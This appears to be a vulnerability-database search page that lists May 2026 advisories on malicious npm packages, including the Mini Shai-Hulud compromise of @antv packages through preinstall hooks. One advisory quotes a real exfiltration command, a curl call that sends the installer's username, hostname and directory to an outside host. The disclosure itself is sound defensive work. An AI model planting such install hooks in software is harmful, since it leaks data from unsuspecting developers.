Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in
🔥 Daily Hot!
💪🏽 CPE Enhanced Advisories
🕶 Shadow Exploits
🕵🏼 Vulners CPE
🔐 Security news
💻 Exploit updates
📑 Blogs review
🐧 Linux vulnerabilities
🐞 Bugbounty
🤖 AI High Score
📰 CVE Feed
show all

667 matches found

OSSF Malicious Packages
OSSF Malicious Packagesadded 2026/05/22 12:13 a.m.6 views

Malicious code in ignite-market-contractstest (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b9babd9b088785649368dbf885050b6a15b218a6b38d2dcd058f0c9eda5109da package.json declares a preinstall lifecycle hook that runs wget --quiet...

5.8AI score
Exploits0References2
OSV
OSVadded 2026/05/22 12:13 a.m.4 views

MAL-2026-4583 Malicious code in ignite-market-contractstest (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b9babd9b088785649368dbf885050b6a15b218a6b38d2dcd058f0c9eda5109da package.json declares a preinstall lifecycle hook that runs wget --quiet...

5.8AI score
Exploits0References2
OSV
OSVadded 2026/05/21 8:18 p.m.3 views

MAL-2026-4530 Malicious code in cloudsmith-vsc (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2b49ad4432747f754181e7a8428aff5fd2613f9d86283f05a04c2dd1f9ac2f2f package.json declares a preinstall hook "preinstall": "node index.js" that runs automatically on npm install. index.js reads installer-side system...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packagesadded 2026/05/21 8:18 p.m.5 views

Malicious code in cloudsmith-vsc (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2b49ad4432747f754181e7a8428aff5fd2613f9d86283f05a04c2dd1f9ac2f2f package.json declares a preinstall hook "preinstall": "node index.js" that runs automatically on npm install. index.js reads installer-side system...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packagesadded 2026/05/21 9:6 a.m.5 views

Malicious code in http-uploader-dev (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 936024fb65d6ab06a1f01fcd765b534812efb873f076e81303d87c0b141bba2b package.json declares "preinstall": "bun run index.js", which on npm install invokes Bun to run index.js. index.js detects the host OS and shells out...

6.2AI score
Exploits0References6
Microsoft Secure
Microsoft Secureadded 2026/05/20 5:48 p.m.8 views

Mini Shai Hulud: Compromised @antv npm packages enable CI/CD credential theft

In this article 1. Attack chain overview 1. Technical analysis 2. How GitHub took action to prevent further harm 2. Mitigation and protection guidance 1. Microsoft Defender XDR Detections 2. Microsoft Defender XDR Threat analytics 3. Advanced hunting 4. Indicators of Compromise IOC 3. References ...

6AI score
Exploits0
OSV
OSVadded 2026/05/20 2:2 p.m.3 views

MAL-2026-4605 Malicious code in mamadoos-test (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 21b5454856fbb360a162083d9d582eba3839b7105ce6e36490e188b3729388d4 package.json declares a preinstall lifecycle hook that runs curl https://huntr.site/depconf/$whoami@$hostname?pwd=$pwd, embedding the installer's OS...

5.8AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packagesadded 2026/05/20 2:2 p.m.4 views

Malicious code in mamadoos-test (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 21b5454856fbb360a162083d9d582eba3839b7105ce6e36490e188b3729388d4 package.json declares a preinstall lifecycle hook that runs curl https://huntr.site/depconf/$whoami@$hostname?pwd=$pwd, embedding the installer's OS...

5.8AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packagesadded 2026/05/19 12:0 a.m.6 views

Malicious code in @antv/f6-hammerjs (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

5.8AI score
Exploits0References4
OSSF Malicious Packages
OSSF Malicious Packagesadded 2026/05/19 12:0 a.m.7 views

Malicious code in @antv/l7plot-component (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

5.8AI score
Exploits0References5
OSSF Malicious Packages
OSSF Malicious Packagesadded 2026/05/19 12:0 a.m.6 views

Malicious code in @antv/g-webgpu-compiler (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

5.8AI score
Exploits0References4
OSSF Malicious Packages
OSSF Malicious Packagesadded 2026/05/19 12:0 a.m.9 views

Malicious code in @antv/f2-context (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

5.8AI score
Exploits0References5
OSSF Malicious Packages
OSSF Malicious Packagesadded 2026/05/19 12:0 a.m.9 views

Malicious code in @antv/f-vue (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

5.8AI score
Exploits0References5
OSSF Malicious Packages
OSSF Malicious Packagesadded 2026/05/19 12:0 a.m.9 views

Malicious code in @antv/x6-plugin-selection (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

5.8AI score
Exploits0References5
OSSF Malicious Packages
OSSF Malicious Packagesadded 2026/05/19 12:0 a.m.8 views

Malicious code in @antv/f2-wx (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

5.8AI score
Exploits0References4
OSSF Malicious Packages
OSSF Malicious Packagesadded 2026/05/19 12:0 a.m.6 views

Malicious code in @antv/x6-plugin-dnd (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

5.8AI score
Exploits0References5
OSSF Malicious Packages
OSSF Malicious Packagesadded 2026/05/19 12:0 a.m.10 views

Malicious code in @antv/xflow-extension (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

5.8AI score
Exploits0References5
OSSF Malicious Packages
OSSF Malicious Packagesadded 2026/05/19 12:0 a.m.10 views

Malicious code in @antv/l7plot (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

5.8AI score
Exploits0References5
OSSF Malicious Packages
OSSF Malicious Packagesadded 2026/05/19 12:0 a.m.8 views

Malicious code in @antv/my-f2-pc (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

5.8AI score
Exploits0References4
OSSF Malicious Packages
OSSF Malicious Packagesadded 2026/05/19 12:0 a.m.8 views

Malicious code in react-adsense (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

5.8AI score
Exploits0References5
Rows per page
Query Builder